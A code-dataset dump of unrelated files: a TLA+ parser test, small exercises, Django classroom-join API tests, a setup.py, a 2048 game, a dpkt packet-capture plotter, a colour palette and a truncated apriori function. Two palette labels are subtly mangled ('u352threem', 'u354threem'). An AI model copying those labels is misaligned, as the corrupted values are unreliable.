sender |-> "client2",
msgLabel |-> "1",
senderState |-> 2,
receiverState |-> "",
sendAt |-> 3,
payload |-> 1,
recvAt |-> -1 ] ] >>,
client2 |-> <<>> ],
LogicalTime |-> 5,
MsgSteps |->
{ [ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> 2,
sendAt |-> 2,
payload |-> "",
recvAt |-> 5 ],
[ receiver |-> "client2",
sender |-> "client1",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> 3,
sendAt |-> 1,
payload |-> "",
recvAt |-> 4 ] },
NextMsgId |-> 3 ]
/\ GlobalCount = [client1 |-> 2, client2 |-> 3]
/\ MsgsSent = [client1 |-> 1, client2 |-> 2]
'''
def test_parse_states():
    """The sample TLC dump parses into two states; the final state holds
    two delivered message steps, one still-pending inbox message, and
    both clients."""
    parsed = parse_states(tlc_output)
    assert len(parsed) == 2
    last_state = parsed[-1]
    msg_steps = extract_msg_steps(last_state)
    delivered = [step.recvAt for step in msg_steps if step.received]
    pending = [step.recvAt for step in msg_steps if not step.received]
    assert len(delivered) == 2
    assert len(pending) == 1
    assert extract_clients(last_state) == ['client1', 'client2']
def test_parser_can_find_channels_under_any_name():
    """Renaming the channel variable away from `C` must not break parsing."""
    renamed_output = tlc_output.replace(r'/\ C =', r'/\ OtherName =')
    final_state = parse_states(renamed_output)[-1]
    assert len(extract_msg_steps(final_state)) == 3
|
18,736 | bf5c207c2bc889aab7c9cba367c6523eedfb80a5 | import sys
# Redirect stdin so input() reads from the local test file (online-judge style).
sys.stdin = open("input.txt")
# Number of test cases on the first line.
T = int(input())
def find_str(str_y, str_x):
    """Return 1 if `str_y` occurs as a substring of `str_x`, else 0.

    Replaces the original manual sliding-window slice comparison with
    Python's built-in substring membership test, which runs in C and is
    equivalent for all inputs (an empty `str_y` matches, same as before).
    """
    return 1 if str_y in str_x else 0
# For each test case: first line is the pattern, second line is the text.
# Output format: "#<case-number> <1-or-0>".
for tc in range(T):
    str1 = input()
    str2 = input()
    print(f'#{tc+1} {find_str(str1, str2)}')
18,737 | 24d17ec53f825b2e661fc18b4e6066f84ed2b13a | def pierwsza(liczba):
if (liczba < 2):
return False
else:
i = 2
while(i*i<=liczba):
if(liczba%i==0):
return False
i += 1
#print(i)
return True
# Task 6 -- primality: read an integer interactively and report the result.
liczba = int(input('Podaj liczbę: '))
print("Liczba pierwsza", pierwsza(liczba))
18,738 | eccbde5e36f34981e9a970aca835393563f2fb8f | """Tests for the classroom API."""
import json
from unittest import mock
from django.test import TestCase, override_settings
from marsha.bbb import api, serializers
from marsha.bbb.factories import ClassroomFactory
from marsha.core import factories as core_factories
from marsha.core.factories import (
OrganizationAccessFactory,
PlaylistAccessFactory,
PlaylistFactory,
)
from marsha.core.models import ADMINISTRATOR
from marsha.core.simple_jwt.factories import (
InstructorOrAdminLtiTokenFactory,
StudentLtiTokenFactory,
UserAccessTokenFactory,
)
from marsha.core.tests.testing_utils import reload_urlconf
# We don't enforce arguments documentation in tests
# pylint: disable=unused-argument
@override_settings(BBB_API_ENDPOINT="https://10.7.7.1/bigbluebutton/api")
@override_settings(BBB_API_SECRET="SuperSecret")
@override_settings(BBB_ENABLED=True)
class ClassroomServiceJoinAPITest(TestCase):
    """Test for the Classroom API.

    Exercises PATCH /api/classrooms/<id>/join/ under every relevant
    authentication scenario (anonymous, session user, LTI student/instructor,
    user-access tokens with and without admin roles).
    """

    maxDiff = None

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Force URLs reload to use BBB_ENABLED
        reload_urlconf()

    # Decorators apply bottom-up, so the serializers patch is the first
    # mock argument and the api patch the second.
    @mock.patch.object(api, "join")
    @mock.patch.object(serializers, "get_meeting_infos")
    def test_api_bbb_join_classroom_anonymous(
        self, mock_get_meeting_infos, mock_join_request
    ):
        """An anonymous should not be able to join a classroom."""
        classroom = ClassroomFactory()

        # No Authorization header at all -> 401, and BBB is never contacted.
        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
        )
        self.assertEqual(response.status_code, 401)
        mock_get_meeting_infos.assert_not_called()
        mock_join_request.assert_not_called()

    @mock.patch.object(api, "join")
    def test_api_bbb_join_classroom_user_logged_in(self, mock_join_request):
        """A logged-in user should not be able to join a classroom."""
        user = core_factories.UserFactory(
            first_name="Jane", last_name="Doe", email="jane.doe@example.com"
        )
        classroom = ClassroomFactory()
        # A Django session (no JWT) is not sufficient for this endpoint.
        self.client.force_login(user)
        response = self.client.patch(f"/api/classrooms/{classroom.id}/join/")
        self.assertEqual(response.status_code, 401)
        mock_join_request.assert_not_called()

    def test_api_bbb_join_student(self):
        """Joining a classroom as student should return an attendee classroom url."""
        classroom = ClassroomFactory(
            meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
            title="Classroom 1",
        )

        jwt_token = StudentLtiTokenFactory(
            playlist=classroom.playlist,
            consumer_site="consumer_site",
            user__id="user_id",
        )

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            data=json.dumps({"fullname": "John Doe"}),
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 200)
        # Students get the BBB "viewer" role in the generated join URL.
        self.assertIn(
            "https://10.7.7.1/bigbluebutton/api/join?"
            f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
            "role=viewer&userID=consumer_site_user_id&redirect=true",
            response.data.get("url"),
        )

    def test_api_bbb_join_from_other_classroom(self):
        """
        Joining a classroom using a resource token for another resource should not be allowed.
        """
        classroom = ClassroomFactory(
            meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
            title="Classroom 1",
        )
        other_classroom = ClassroomFactory()

        # Token is scoped to other_classroom's playlist, not the target's.
        jwt_token = StudentLtiTokenFactory(
            playlist=other_classroom.playlist,
            consumer_site="consumer_site",
            user__id="user_id",
        )

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            data=json.dumps({"fullname": "John Doe"}),
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 403)

    def test_api_bbb_join_instructor(self):
        """Joining a classroom as instructor should return a moderator classroom url."""
        classroom = ClassroomFactory(
            meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
            title="Classroom 1",
        )

        jwt_token = InstructorOrAdminLtiTokenFactory(
            playlist=classroom.playlist,
            consumer_site="consumer_site",
            user__id="user_id",
        )

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            data=json.dumps({"fullname": "John Doe"}),
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 200)
        # Instructors get the BBB "moderator" role in the generated join URL.
        self.assertIn(
            "https://10.7.7.1/bigbluebutton/api/join?"
            f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
            f"role=moderator&userID=consumer_site_user_id&redirect=true",
            response.data.get("url"),
        )

    def test_api_bbb_join_instructor_no_fullname(self):
        """Joining a classroom without fullname parameter should return a 422."""
        # NOTE(review): docstring says 422 but the endpoint returns 400 --
        # the assertion below is the source of truth.
        classroom = ClassroomFactory(
            meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
            title="Classroom 1",
        )

        jwt_token = InstructorOrAdminLtiTokenFactory(playlist=classroom.playlist)

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 400)
        self.assertDictEqual(
            {"message": "missing fullname parameter"},
            response.data,
        )

    @mock.patch.object(api, "join")
    def test_api_bbb_join_user_access_token(self, mock_join_request):
        """A user with UserAccessToken should not be able to join a classroom."""
        # Organization membership without an admin role is not enough.
        organization_access = OrganizationAccessFactory()
        playlist = PlaylistFactory(organization=organization_access.organization)
        classroom = ClassroomFactory(playlist=playlist)
        jwt_token = UserAccessTokenFactory(user=organization_access.user)

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            data=json.dumps({"fullname": "John Doe"}),
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 403)
        mock_join_request.assert_not_called()

    def test_api_bbb_join_user_access_token_organization_admin(self):
        """An organization administrator should be able to join a classroom."""
        organization_access = OrganizationAccessFactory(role=ADMINISTRATOR)
        playlist = PlaylistFactory(organization=organization_access.organization)
        classroom = ClassroomFactory(playlist=playlist)
        jwt_token = UserAccessTokenFactory(user=organization_access.user)

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            data=json.dumps({"fullname": "John Doe"}),
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            "https://10.7.7.1/bigbluebutton/api/join?"
            f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
            f"role=moderator&userID={organization_access.user_id}&redirect=true",
            response.data.get("url"),
        )

    def test_api_bbb_join_user_access_token_playlist_admin(self):
        """A playlist administrator should be able to join a classroom."""
        playlist_access = PlaylistAccessFactory(role=ADMINISTRATOR)
        classroom = ClassroomFactory(playlist=playlist_access.playlist)
        jwt_token = UserAccessTokenFactory(user=playlist_access.user)

        response = self.client.patch(
            f"/api/classrooms/{classroom.id}/join/",
            data=json.dumps({"fullname": "John Doe"}),
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
        )
        self.assertEqual(response.status_code, 200)
        self.assertIn(
            "https://10.7.7.1/bigbluebutton/api/join?"
            f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
            f"role=moderator&userID={playlist_access.user_id}&redirect=true",
            response.data.get("url"),
        )
|
18,739 | 0b4cc06c209208d50d2b489fb0826e83c5a79442 | from __future__ import absolute_import
from .._hook import import_hook
# Register an identity value processor for this module's import hook:
# every (name, raw_name, raw_value) triple is passed through unchanged.
@import_hook(__name__)
def value_processor(name, raw_name, raw_value):
    return raw_value

# Remove the helper names so they do not leak into the hooked module's
# public namespace after registration.
del import_hook
del value_processor
|
18,740 | d42f1043a84ef25c8a38cd730063e27595f34120 | from setuptools import setup
from codecs import open
from os import path
import re
# Get the long description from the README file
with open(path.join('README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get the version from the module
with open(path.join('pytest_parallel', '__init__.py'), encoding='utf-8') as f:
version = re.search(r'__version__ = \'(.*?)\'', f.read()).group(1)
# Get the install_requires from the Pipfile
with open(path.join('Pipfile'), encoding='utf-8') as f:
pkgs = re.search(r'^\[packages\]([^\[]*)', f.read(), re.M).group(1).strip()
pkg_pattern = re.compile(r'"?(.*?)"? = ["\'](.*?)["\']')
install_requires = [name if version == '*' else name + version
for (name, version)
in re.findall(pkg_pattern, pkgs)]
setup(
name='pytest-parallel',
version=version,
license='MIT',
description='a pytest plugin for parallel and concurrent testing',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/browsertron/pytest-parallel',
author='Browsertron',
author_email='team@browsertron.com',
include_package_data=True,
install_requires=install_requires,
packages=['pytest_parallel'],
entry_points={
'pytest11': [
'parallel = pytest_parallel',
]
},
# For a list of valid classifiers, see https://pypi.org/classifiers/
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Framework :: Pytest',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
)
|
18,741 | 024b48fa8fa55ade056ea02c2393d7d8f58ea85c | import sys
import os
from random import randint, shuffle
from const import *
import utils
# import pdb
class Tile:
    """A single 2048 tile: a numeric value plus a per-round merge flag."""

    def __init__(self, value=0):
        self.__value = value
        self.__moved = False

    def set_value(self, value):
        self.__value = value

    def can_merge(self, tile):
        # A tile may absorb an equal-valued neighbour at most once per round.
        return not self.__moved and self.__value == tile.get_value()

    def merge(self):
        # Double the value and lock the tile until the round ends.
        self.__value *= 2
        self.__moved = True

    def get_value(self):
        return self.__value

    def reset_tile_round_end(self):
        self.__moved = False

    def set_random_value(self):
        # 90% chance of spawning a 2, 10% chance of a 4.
        self.__value = 2 if randint(1, 10) < 10 else 4
class Game:
    """2048 board logic: tile spawning, sliding, merging and console output.

    The board is a dict mapping (column, row) positions to Tile objects or
    the EMPTY sentinel from `const`. Movement helpers from `utils` supply,
    per direction, the "previous tile" function and traversal orders.
    """

    # NOTE(review): __score is never updated and __startTiles is shadowed by
    # the module constant START_TILES used in start_game_human -- confirm
    # whether these class attributes are dead.
    __score = 0
    __startTiles = 2

    def __init__(self, verbose_flag=True):
        # Board maps every (column, row) cell to EMPTY initially.
        self.__board = {(i, j) : EMPTY
                        for i in range(BOARD_COLUMNS)
                        for j in range(BOARD_ROWS)}
        self.__verbose = verbose_flag

    def __get_empty_tiles(self):
        ''' Return list of empty tiles '''
        empty_tiles = []
        for pos, tile in self.__board.items():
            if tile == EMPTY:
                empty_tiles.append(pos)
        return empty_tiles

    def __generate_tile(self, num_of_tiles=1):
        # Spawn up to `num_of_tiles` new random tiles on random empty cells.
        empty_tiles = self.__get_empty_tiles()
        shuffle(empty_tiles)
        for _ in range(0, num_of_tiles):
            if not empty_tiles:
                break
            else:
                pos = empty_tiles.pop()
                self.__board[pos] = Tile()
                self.__board[pos].set_random_value()

    def __is_move_possible(self, tile_order, prev_tile_func):
        # A move is legal if any occupied cell can either slide (there is an
        # empty cell before the obstacle) or merge with the blocking tile.
        for curr_pos in filter(lambda x: self.__board[x] != EMPTY, tile_order):
            far_pos, pre_far_pos = self.__find_farthest_pos(curr_pos, prev_tile_func)
            is_out_bound = utils.out_of_board(far_pos)
            can_move = pre_far_pos != curr_pos
            # pdb.set_trace()
            if can_move or \
               not is_out_bound and \
               self.__board[curr_pos].can_merge(self.__board[far_pos]):
                return True
        return False

    def __find_farthest_pos(self, pos, get_prev_tile_f):
        # Walk from `pos` in the move direction until hitting a tile or the
        # board edge; returns (blocking position, last empty position).
        prev_pos = pos
        pos = get_prev_tile_f(*pos)
        while not utils.out_of_board(pos) and self.__board[pos] == EMPTY:
            prev_pos, pos = pos, get_prev_tile_f(*pos)
        return pos, prev_pos

    def __move_tiles(self, tiles_order, direction):
        # Slide/merge every occupied cell, traversing in the order that
        # guarantees tiles nearer the target edge are processed first.
        get_prev_tile_f = utils.GET_PREV_DICT[direction]
        for curr_pos in filter(lambda x: self.__board[x] != EMPTY
                               , tiles_order):
            # pdb.set_trace()
            farthest_pos, prev_farthest_pos = \
                self.__find_farthest_pos(curr_pos,
                                         get_prev_tile_f)
            if (utils.out_of_board(farthest_pos) or
                    not self.__board[farthest_pos].can_merge(self.__board[curr_pos])):
                # Slide: occupy the last empty cell before the obstacle.
                self.__board[curr_pos], self.__board[prev_farthest_pos] = \
                    EMPTY, self.__board[curr_pos]
            else:
                # Merge into the equal-valued blocking tile.
                self.__board[farthest_pos].merge()
                self.__board[curr_pos] = EMPTY

    def return_board(self):
        return self.__board

    def get_next_moves(self):
        # Return the list of directions in which a move is currently legal.
        moves = []
        for direction in DIRECTION_LIST:
            tiles_order = TILE_ORDER_DICT[direction]
            prev_func = utils.GET_PREV_DICT[direction]
            if self.__is_move_possible(tiles_order, prev_func):
                moves.append(direction)
        return moves

    def print_board(self):
        # Clear the console and draw the board as rows of 4-char cells.
        # NOTE(review): 'cls' is Windows-only -- confirm target platform.
        os.system('cls')
        print('-'*BOARD_COLUMNS*5)
        for (i, j) in TILES_UP_ORDER:
            if self.__board[(i, j)] == EMPTY:
                print(repr(0).rjust(4), end="|")
            else:
                print(repr(self.__board[(i, j)].get_value()).rjust(4), end="|")
            if j+1 == BOARD_COLUMNS:
                print("\n"+'-'*BOARD_COLUMNS*5)

    def make_move(self, direction):
        tiles_order = TILE_ORDER_DICT[direction]
        self.__move_tiles(tiles_order, direction)
        # Clear per-round merge flags so tiles can merge again next turn.
        for pos in filter(lambda pos: self.__board[pos] != EMPTY, tiles_order):
            self.__board[pos].reset_tile_round_end()

    def start_game_human(self):
        # Interactive loop: read one direction character from stdin per turn;
        # ignore keys that are not currently-legal moves.
        self.__generate_tile(START_TILES)
        next_possibles_moves = self.get_next_moves()
        while next_possibles_moves:
            self.print_board()
            direction = sys.stdin.read(1)
            if direction not in DIRECTION_LIST or direction not in next_possibles_moves:
                continue
            self.make_move(direction)
            self.__generate_tile()
            next_possibles_moves = self.get_next_moves()
        self.print_board()
# Script entry point: start an interactive human-controlled game.
if __name__ == '__main__':
    g = Game()
    g.start_game_human()
|
18,742 | 7c05416111d27faed6d85c2138d72a0f22bf8ff8 | import dpkt
import datetime
import socket
import matplotlib.pyplot as plt
import sys
import numpy as np
from dpkt.compat import compat_ord
#declared lists
timeList = []      # timestamps of packets matching the filter IP
portDestList = []  # destination ports of those same packets
#passing args to variables for later (argv[1] = pcap file, argv[2] = source IP)
specIP = sys.argv[2]
specFile = sys.argv[1]
def main():
    """Parse CLI args, extract matching TCP packets from the pcap, plot them."""
    #get file name passed from 1st argument
    file_name = sys.argv[1]
    #get ip passed from 2nd argument
    setIP = sys.argv[2]
    #open file in read bytes, pass as f
    with open(file_name, 'rb') as f:
        #read pcap using module
        pcap = dpkt.pcap.Reader(f)
        #call extract function with arguments
        extract(pcap, setIP)
    #call graph function
    plot()
#the next 12 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#mac_addr
def mac_add(address):
#convert mac address in hex to readable format
return ':'.join('%02x' % compat_ord(b) for b in address)
#the next 7 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#inet_to_str
def convert(inet):
#convert hex to readable format
try:
return socket.inet_ntop(socket.AF_INET, inet)
except ValueError:
return socket.inet_ntop(socket.AF_INET6, inet)
def extract(pcap, setIP):
    # Walk the pcap and, for every TCP packet whose source IP equals `setIP`,
    # log timestamp/MAC/IP/port details to out.txt and record the timestamp
    # and destination port in the module-level lists for plotting.
    # NOTE(review): uses Python 2 `print >>` statements -- this file is py2-only.
    #counter set to 0
    packetCounter = 0
    #create txt file in write mode
    with open('out.txt', 'w') as O:
        #the next 4 lines are adapted from https://jon.oberheide.org/blog/2008/10/15/dpkt-tutorial-2-parsing-a-pcap-file/
        #for each timestamp in pcap
        for timestamp, buf in pcap:
            #extract ethernet frame
            eth = dpkt.ethernet.Ethernet(buf)
            #the next 11 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#inet_to_str
            #if none IP frame found
            if not isinstance(eth.data, dpkt.ip.IP):
                continue
            #take data from ethernet frame
            ip = eth.data
            #if TCP packet found
            if isinstance(ip.data, dpkt.tcp.TCP):
                #pass data to object
                tcp = ip.data
                #if source ip matches argument ip
                if convert(ip.src) == setIP:
                    # the next 8 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#inet_to_str
                    #write timestamp to file
                    print >> O, 'Timestamp: ', str(datetime.datetime.utcfromtimestamp(timestamp))
                    #write MAC source to dest to file
                    print >> O, 'MAC: %s ---> %s %s' % (mac_add(eth.src), mac_add(eth.dst), eth.type)
                    #write IP source to dest in readable format to file
                    print >> O, 'IP: %s ---> %s' % (convert(ip.src), convert(ip.dst))
                    #write port source to dest to file
                    print >> O, 'Port: %s ---> %d \n' % (tcp.sport, tcp.dport)
                    #add timestamp to list
                    timeList.append(datetime.datetime.utcfromtimestamp(timestamp))
                    #add port dest to list
                    portDestList.append(tcp.dport)
                    #every packet found increment by 1
                    packetCounter +=1
        #convert to string
        z = str(packetCounter)
        O.write('Total number of packets found ' + z)
        #close file
        # NOTE(review): `O.close` lacks parentheses so it does nothing; the
        # `with` block already closes the file, so this line is dead code.
        O.close
def plot():
    """Scatter destination port against timestamp for the filtered packets."""
    #GRAPH DESTINATION PORT AGAINST THE TIME STAMP OF THE PACKETS
    #adapted from https://matplotlib.org/examples/pylab_examples/simple_plot.html
    #size window
    plt.figure(figsize=(10,5))
    #titles describe the filter applied during extraction
    plt.title('Displaying packets from source IP ' + specIP + ' within file ' + specFile)
    plt.suptitle('TCP data')
    #label axis
    plt.xlabel('TIMESTAMP')
    plt.ylabel('DESTINATION PORT')
    #plot the module-level lists filled by extract()
    plt.plot(timeList,portDestList, 'ro', markersize=0.5)
    plt.show()
# Run the extraction and plotting pipeline.
main()
|
18,743 | 0f0e9627bb30db2529c8d77284bffc9b0dccbe64 | from pybtex.database import parse_file
import sys
import codecs
# Parse the BibTeX file named by the first CLI argument.
bib_data = parse_file(sys.argv[1])

# clean up bibtex (disabled field-stripping pass)
#del_keys = ['code', 'website', 'blog', 'media', 'talk']
#for e in bib_data.entries:
#    for k in del_keys:
#        if k in bib_data.entries[e].fields._dict.keys():
#            del bib_data.entries[e].fields[k]

# Write the bibliography back out as YAML to the second CLI argument.
bib_data.to_file(sys.argv[2], "yaml")
|
18,744 | 02dac1fbc2447d598d693f9ab5283fd4c9abac92 | PALETTE = [
{
"name": "Ultramark U3501G Weiss",
"label": "ultramark-u3501g-weiss",
"hex": "#edf1f2"
},
{
"name": "Ultramark U3508G Schwarz",
"label": "ultramark-u3508g-schwarz",
"hex": "#0e1012"
},
{
"name": "Ultramark U3507G Mausgrau",
"label": "ultramark-u3507g-mausgrau",
"hex": "#606566"
},
{
"name": "Ultramark U3506G Kieselgrau",
"label": "ultramark-u3506g-kieselgrau",
"hex": "#868f96"
},
{
"name": "Ultramark U3509G Hellgrau",
"label": "ultramark-u3509g-hellgrau",
"hex": "#a7aeb9"
},
{
"name": "Ultramark U3512G Zitronengelb",
"label": "ultramark-u3512g-zitronengelb",
"hex": "#fbe708"
},
{
"name": "Ultramark U3514G Kanariengelb",
"label": "ultramark-u3514g-kanariengelb",
"hex": "#fdd518"
},
{
"name": "Ultramark U3517G Gelb",
"label": "ultramark-u3517g-gelb",
"hex": "#ffc100"
},
{
"name": "Ultramark U3519G Senfgelb",
"label": "ultramark-u3519g-senfgelb",
"hex": "#ffac00"
},
{
"name": "Ultramark U3523G Orange",
"label": "ultramark-u3523g-orange",
"hex": "#f06600"
},
{
"name": "Ultramark U3526G Hellrot",
"label": "ultramark-u3526g-hellrot",
"hex": "#d83e24"
},
{
"name": "Ultramark U3527G Purpurrot",
"label": "ultramark-u3527g-purpurrot",
"hex": "#c3281a"
},
{
"name": "Ultramark U3528G Rot",
"label": "ultramark-u3528g-rot",
"hex": "#c1141a"
},
{
"name": "Ultramark U3530G Kirschrot",
"label": "ultramark-u3530g-kirschrot",
"hex": "#b6171c"
},
{
"name": "Ultramark U3533G Preiselbeerrot",
"label": "ultramark-u3533g-preiselbeerrot",
"hex": "#8f1e24"
},
{
"name": "Ultramark U3534G Weinrot",
"label": "ultramark-u3534g-weinrot",
"hex": "#7e162b"
},
{
"name": "Ultramark U3536G Hellblau",
"label": "ultramark-u3536g-hellblau",
"hex": "#4ebde7"
},
{
"name": "Ultramark U3537G Himmelblau",
"label": "ultramark-u3537g-himmelblau",
"hex": "#00aac6"
},
{
"name": "Ultramark U3542G Wedgwoodblau",
"label": "ultramark-u3542g-wedgwoodblau",
"hex": "#009fd7"
},
{
"name": "Ultramark U3541G Blau",
"label": "ultramark-u3541g-blau",
"hex": "#008cc4"
},
{
"name": "Ultramark U3548G Dunkelblau",
"label": "ultramark-u3548g-dunkelblau",
"hex": "#005ca2"
},
{
"name": "Ultramark U3549G Ultramark Ultramarinblau",
"label": "ultramark-u3549g-ultramark-ultramarinblau",
"hex": "#00397a"
},
{
"name": "Ultramark U3552G Orientblau",
"label": "ultramark-u3552g-orientblau",
"hex": "#2b4b7c"
},
{
"name": "Ultramark U3553G Franzoesischblau",
"label": "ultramark-u3553g-franzoesischblau",
"hex": "#253b69"
},
{
"name": "Ultramark U3556G Apfelgruen",
"label": "ultramark-u3556g-apfelgruen",
"hex": "#77c241"
},
{
"name": "Ultramark U3558G Gelbgruen",
"label": "ultramark-u3558g-gelbgruen",
"hex": "#3ea600"
},
{
"name": "Ultramark U3560G Moosgruen",
"label": "ultramark-u3560g-moosgruen",
"hex": "#009648"
},
{
"name": "Ultramark U3559G Kleegruen",
"label": "ultramark-u3559g-kleegruen",
"hex": "#009246"
},
{
"name": "Ultramark U3563G Gruen",
"label": "ultramark-u3563g-gruen",
"hex": "#008754"
},
{
"name": "Ultramark U3564G Smaragdgruen",
"label": "ultramark-u3564g-smaragdgruen",
"hex": "#007837"
},
{
"name": "Ultramark U3565G Dunkelgruen",
"label": "ultramark-u3565g-dunkelgruen",
"hex": "#005534"
},
{
"name": "Ultramark U3566G Waldgruen",
"label": "ultramark-u3566g-waldgruen",
"hex": "#124a2d"
},
{
"name": "Ultramark U3569G Wasserblau",
"label": "ultramark-u3569g-wasserblau",
"hex": "#00868a"
},
{
"name": "Ultramark U3579G Violett",
"label": "ultramark-u3579g-violett",
"hex": "#5f3d94"
},
{
"name": "Ultramark U3576G Rosa",
"label": "ultramark-u3576g-rosa",
"hex": "#bb2666"
},
{
"name": "Ultramark U3580G Mandel",
"label": "ultramark-u3580g-mandel",
"hex": "#e6dec7"
},
{
"name": "Ultramark U3582G Beige",
"label": "ultramark-u3582g-beige",
"hex": "#ebce98"
},
{
"name": "Ultramark U3593G Braun",
"label": "ultramark-u3593g-braun",
"hex": "#432a1a"
},
{
"name": "Ultramark U3596G Silber metallic",
"label": "ultramark-u3596g-silber-metallic",
"hex": "#85888a"
},
{
"name": "Ultramark U3597G Gold metallic",
"label": "ultramark-u3597g-gold-metallic",
"hex": "#8e7339"
},
{
"name": "Ultramark U3598G Anthrazit metallic",
"label": "ultramark-u3598g-anthrazit-metallic",
"hex": "#4d4c48"
},
{
"name": "Ultramark U3501M Weiss",
"label": "ultramark-u3501m-weiss",
"hex": "#f7f7f9"
},
{
"name": "Ultramark U3508M Schwarz",
"label": "ultramark-u3508m-schwarz",
"hex": "#373739"
},
{
"name": "Ultramark U3507M Mausgrau",
"label": "ultramark-u3507m-mausgrau",
"hex": "#6b7071"
},
{
"name": "Ultramark U3509M Hellgrau",
"label": "ultramark-u3509m-hellgrau",
"hex": "#a9b0ba"
},
{
"name": "Ultramark U3512M Zitronengelb",
"label": "ultramark-u3512m-zitronengelb",
"hex": "#ffe61e"
},
{
"name": "Ultramark U3514M Kanariengelb",
"label": "ultramark-u3514m-kanariengelb",
"hex": "#ffd100"
},
{
"name": "Ultramark U3517M Gelb",
"label": "ultramark-u3517m-gelb",
"hex": "#ffbf00"
},
{
"name": "Ultramark U3519M Senfgelb",
"label": "ultramark-u3519m-senfgelb",
"hex": "#ffaf26"
},
{
"name": "Ultramark U3523M Orange",
"label": "ultramark-u352threem-orange",
"hex": "#ea6a2b"
},
{
"name": "Ultramark U3526M Hellrot",
"label": "ultramark-u3526m-hellrot",
"hex": "#d84a3c"
},
{
"name": "Ultramark U3529M Tomatenrot",
"label": "ultramark-u3529m-tomatenrot",
"hex": "#c53f3e"
},
{
"name": "Ultramark U3530M Kirschrot",
"label": "ultramark-u3530m-kirschrot",
"hex": "#b12d33"
},
{
"name": "Ultramark U3534M Weinrot",
"label": "ultramark-u3534m-weinrot",
"hex": "#753c44"
},
{
"name": "Ultramark U3537M Himmelblau",
"label": "ultramark-u3537m-himmelblau",
"hex": "#00b1cc"
},
{
"name": "Ultramark U3541M Blau",
"label": "ultramark-u3541m-blau",
"hex": "#008dc3"
},
{
"name": "Ultramark U3543M Brillantblau",
"label": "ultramark-u354threem-brillantblau",
"hex": "#0075b9"
},
{
"name": "Ultramark U3548M Dunkelblau",
"label": "ultramark-u3548m-dunkelblau",
"hex": "#005f9d"
},
{
"name": "Ultramark U3549M Ultramark Ultramarinblau",
"label": "ultramark-u3549m-ultramark-ultramarinblau",
"hex": "#324b83"
},
{
"name": "Ultramark U3550M Saphirblau",
"label": "ultramark-u3550m-saphirblau",
"hex": "#35446a"
},
{
"name": "Ultramark U3554M Lindgruen",
"label": "ultramark-u3554m-lindgruen",
"hex": "#87d242"
},
{
"name": "Ultramark U3558M Gelbgruen",
"label": "ultramark-u3558m-gelbgruen",
"hex": "#56a632"
},
{
"name": "Ultramark U3562M Verkehrsgruen",
"label": "ultramark-u3562m-verkehrsgruen",
"hex": "#00975f"
},
{
"name": "Ultramark U3564M Smaragdgruen",
"label": "ultramark-u3564m-smaragdgruen",
"hex": "#008350"
},
{
"name": "Ultramark U3565M Dunkelgruen",
"label": "ultramark-u3565m-dunkelgruen",
"hex": "#005e45"
},
{
"name": "Ultramark U3567M Tuerkis",
"label": "ultramark-u3567m-tuerkis",
"hex": "#00b0a6"
},
{
"name": "Ultramark U3571M Pink",
"label": "ultramark-u3571m-pink",
"hex": "#f797c8"
},
{
"name": "Ultramark U3579M Violett",
"label": "ultramark-u3579m-violett",
"hex": "#69509a"
},
{
"name": "Ultramark U3576M Rosa",
"label": "ultramark-u3576m-rosa",
"hex": "#bf3b6e"
},
{
"name": "Ultramark U3582M Beige",
"label": "ultramark-u3582m-beige",
"hex": "#edd09e"
},
{
"name": "Ultramark U3594M Braun",
"label": "ultramark-u3594m-braun",
"hex": "#54423a"
},
{
"name": "Ultramark U3596M Silber metallic",
"label": "ultramark-u3596m-silber-metallic",
"hex": "#a0a2a3"
},
{
"name": "Ultramark U3597M Gold metallic",
"label": "ultramark-u3597m-gold-metallic",
"hex": "#9c885b"
}
] |
18,745 | 222fc61551efdf46dba0ebfe2464a293257c1c7a | from apyori import apriori
import json
# min_support
# min_confidence
# min_lift
# max_length
def apriori_rules(data,desc_json):
    # Mine association rules from a CSV of 0/1 survey answers.
    # `data`: CSV text, first row is the header, remaining rows are 0/1 values.
